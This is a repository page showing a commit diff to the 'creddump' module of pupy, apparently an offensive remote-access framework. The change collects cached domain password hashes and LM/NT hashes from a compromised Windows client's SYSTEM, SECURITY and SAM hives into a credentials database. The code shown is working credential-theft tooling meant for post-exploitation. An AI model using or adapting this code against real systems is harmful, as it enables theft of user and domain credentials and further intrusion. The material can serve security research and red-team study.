Rooba
/
pupy
mirror of https://github.com/n1nj4sec/pupy.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'cred' of https://github.com/AlessandroZ/pupy into AlessandroZ-cred

This commit is contained in:
n1nj4sec 2016-09-27 21:09:17 +02:00
parent c91c214ed4 6a7b9fe943
commit c5e2b9f3b3
1 changed files with 5 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
pupy/modules/creddump.py
View File

@ -171,6 +171,9 @@ class CredDump(PupyModule):
self.warning("error deleting temporary files: %s"%str(e)) self.warning("error deleting temporary files: %s"%str(e))
# Time to run creddump! # Time to run creddump!
db = Credentials()
hashes = []
# HiveFileAddressSpace - Volatilty # HiveFileAddressSpace - Volatilty
sysaddr = HiveFileAddressSpace(os.path.join(self.rep, "SYSTEM")) sysaddr = HiveFileAddressSpace(os.path.join(self.rep, "SYSTEM"))
secaddr = HiveFileAddressSpace(os.path.join(self.rep, "SECURITY")) secaddr = HiveFileAddressSpace(os.path.join(self.rep, "SECURITY"))
@ -180,13 +183,13 @@ class CredDump(PupyModule):
self.success("dumping cached domain passwords...") self.success("dumping cached domain passwords...")
for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista): for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista):
self.success("%s:%s:%s:%s" % (u.lower(), h.encode('hex'), self.log("%s:%s:%s:%s" % (u.lower(), h.encode('hex'),
d.lower(), dn.lower())) d.lower(), dn.lower()))
hashes.append({'hashes': "%s:%s:%s:%s" % (u.lower(), h.encode('hex'), d.lower(), dn.lower()), 'Tool': 'Creddump', 'uid':self.client.short_name()})
self.success("dumping LM and NT hashes...") self.success("dumping LM and NT hashes...")
bootkey = get_bootkey(sysaddr) bootkey = get_bootkey(sysaddr)
hbootkey = get_hbootkey(samaddr,bootkey) hbootkey = get_hbootkey(samaddr,bootkey)
hashes = []
for user in get_user_keys(samaddr): for user in get_user_keys(samaddr):
lmhash, nthash = get_user_hashes(user,hbootkey) lmhash, nthash = get_user_hashes(user,hbootkey)
if not lmhash: lmhash = empty_lm if not lmhash: lmhash = empty_lm
@ -194,7 +197,6 @@ class CredDump(PupyModule):
self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name, 16), lmhash.encode('hex'), nthash.encode('hex'))) self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name, 16), lmhash.encode('hex'), nthash.encode('hex')))
hashes.append({'hashes': "%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name, 16), lmhash.encode('hex'), nthash.encode('hex')), 'Tool': 'Creddump', 'uid':self.client.short_name()}) hashes.append({'hashes': "%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name, 16), lmhash.encode('hex'), nthash.encode('hex')), 'Tool': 'Creddump', 'uid':self.client.short_name()})
db = Credentials()
db.add(hashes) db.add(hashes)
self.success("Hashes stored on the database") self.success("Hashes stored on the database")